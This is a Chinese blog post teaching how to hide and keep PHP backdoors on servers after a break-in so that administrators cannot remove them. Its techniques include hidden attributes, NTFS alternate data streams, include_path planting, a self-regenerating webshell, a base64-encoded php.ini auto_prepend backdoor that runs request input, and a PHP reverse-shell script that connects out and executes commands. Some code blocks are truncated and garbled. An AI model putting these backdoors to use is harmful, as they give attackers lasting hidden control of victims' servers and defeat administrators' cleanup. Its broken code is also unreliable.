php后门隐藏技巧-白红宇

php后门隐藏技巧

阅读量：5286 次

发布时间：2019-06-14

本文共 3547 字，大约阅读时间需要 11 分钟。

Part 1 前言

　　辛辛苦苦拿下的shell，几天没看，管理员给删了。

这篇文章是我个人小小的总结，很多方面都建立在自己理解上思考，如果你有更好的思路，各位表哥们也可以分享。

Part 2 隐藏

　　隐藏的技巧很多，废话不多说直接开始。

一. attrib +s +h

　　创建系统隐藏文件。

attrib +s +a +r +h / attrib +s +h 文件名

　　查看隐藏文件

二. 利用ADS隐藏文件

　　NTFS交换数据流（Alternate　Data　Streams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上，而在资源管理器中却只能看到宿主文件，找不到寄宿文件。利用ADS数据流，我们可以做很多有趣的事情。(抄的)

　　1.首先创建ADS隐藏文件

在命令行，echo一个数据流进去，比如index文件是正常文件。

echo ^
      > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

　　可用 dir /r 命令来查看

　　修改与删除

修改:

　　进入文件所在目录，notepad index.php:shell.jpg

如何删除index.php:shell.jpg呢？

　　直接删除index.php

　　2. 文件包含

　　我们生成了index.php:shell.jpg，可以通过包含文件的方式来使用。

　　还可以用上面学的隐藏include.php

　　3. 免杀

隐藏了也不行兄dei，D盾一扫瞬间爆炸。

把 index.php:shell.jpg hex编码

三. php环境变量留shell

环境变量 include_path

　　在C盘，创建 C:\php\pear目录，把木马文件丢上去。

　　在包含下就OK了

四. 不死马

运行后，会删除自身，生成一个webshell.php，管理员删除后还会生成。


     ');          sleep(5);      }

解决覆盖重写

或者重启web服务删掉即可。

　不死马2

五. php.ini后门

　　将下面后门写入php.ini

allow_url_include=Onauto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"                             // base64 
      　　　　　　　　　            // 后门类型可自己修改。

　　后门留好后，需要重启web服务。

方法1. 如果权限很大的话，自己手动重启，缺点容易暴露，重启服务，就要上服务器，某里的服务器，异地登陆有短信提醒。

方法2.就是加载一个php_socke.php脚本，让他重新加载php.ini

　　脚本如下。这样就可以了


      'c:\\windows\\system32');}        $descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"),);        $host=gethostbyname($host);        $proto=getprotobyname("tcp");        if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){
   die("Socket创建失败");}        if(($ret=@socket_connect($sock,$host,$port))<0){
   die("连接失败");}        else{                $message=" PHP反弹连接\n";                @socket_write($sock,$message,strlen($message));                $cwd=str_replace('\\','/',dirname(__FILE__));                while($cmd=@socket_read($sock,65535,$proto))                {                        if(trim(strtolower($cmd))=="exit"){                                socket_write($sock,"Bye\n"); exit;                        }else{                                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);                                if (is_resource($process)){                                fwrite($pipes[0], $cmd);                                fclose($pipes[0]);                                $msg=stream_get_contents($pipes[1]);                                socket_write($sock,$msg,strlen($msg));                                fclose($pipes[1]);                                $msg=stream_get_contents($pipes[2]);                                socket_write($sock,$msg,strlen($msg));                                $return_value = proc_close($process);                                }                        }                }        }}?>

　　有个尴尬的是，这个脚本不太稳定，这个方法不是100%可以成功的。但是如图这个php版本测试成功。